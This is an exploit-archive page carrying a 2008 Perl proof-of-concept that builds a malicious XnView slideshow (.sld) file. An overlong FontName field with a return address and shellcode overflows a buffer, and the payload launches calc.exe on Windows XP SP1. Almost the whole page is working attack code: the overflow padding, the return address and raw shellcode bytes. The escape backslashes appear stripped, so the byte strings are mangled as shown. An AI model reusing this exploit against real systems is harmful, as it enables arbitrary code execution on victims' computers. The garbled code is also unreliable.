XnView 1.92.1 Slideshow (FontName) Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : XnView 1.92.1 Slideshow (FontName) Buffer Overflow Exploit
# Published : 2008-04-02
# Author : haluznik
# Previous Title : MS Visual Basic Enterprise Ed. 6 SP6 DSR File Local BOF Exploit
# Next Title : Microsoft Office XP SP3 PPT File Buffer Overflow Exploit (ms08-016)

#!/usr/bin/perl

# ================================================================
# XnView 1.92.1 Slideshow "FontName" Buffer Overflow
# ================================================================
#
# Calc execution POC Exploit for WinXP SP1 pro English
#
# Found by   : Stefan Cornelius, Secunia Research
# Advisory   : http://secunia.com/secunia_research/2008-6/advisory
#
# Exploit by : haluznik | haluznik<at>gmail.com
#
# 04.01.2008 ..April Fools Day ;)
# ================================================================


print "n [*] XnView 1.92.1 Slideshow exploit by haluzniknn";

my $head=
"x23x20x53x6cx69x64x65x20x53x68".
"x6fx77x20x53x65x71x75x65x6ex63".
"x65x0dx0ax46x6fx6ex74x4ex61x6d".
"x65x20x3dx20x22";

$fontname = "A" x 32 . "xccx59xfbx77";

my $shellcode=
"x33xc0x50x68x63x61x6cx63x54x5b".
"x50x53xb9x44x80xc2x77xffxd1x50".
"xbbxfdx98xe7x77xffxd3";

my $tail=
"x22x0dx0ax22x43x3ax5cx74x65x73".
"x74x2ex6ax70x67x22x0dx0a";

$sld = $head . $fontname . $shellcode . $tail;

print " [+] Creating poc.sld file..n";

open(file,">poc.sld") || die " [-] cannot write filen";
print(file $sld);
close(file);
print " [*] Done!n";

# www.Syue.com [2008-04-02]